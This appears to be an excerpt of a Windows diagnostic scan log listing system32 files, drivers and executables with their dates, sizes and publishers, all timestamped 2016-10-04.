2016-10-04 01:16 - 2016-10-04 01:16 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01438720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01413664 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01384704 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01344992 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01344000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01276608 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01144600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01110016 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01056768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01015648 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00920576 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00894976 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00834128 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00823808 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00822272 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00781664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00702416 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00626688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00623616 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00614752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00582144 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00581672 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00564488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00550240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00500736 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00498016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00484544 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00470368 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00461312 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00432328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00399712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00399360 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00378368 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00357216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00356704 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00356704 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00353792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00342368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicesFlowBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00320152 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00315736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00260448 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-10-04 01:16 - 2016-10-04 01:16 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00244224 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00186720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00170448 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS
2016-10-04 01:16 - 2016-10-04 01:16 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00141824 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00127168 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00125792 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\AppVStrm.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00094528 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00093984 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\olepro32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
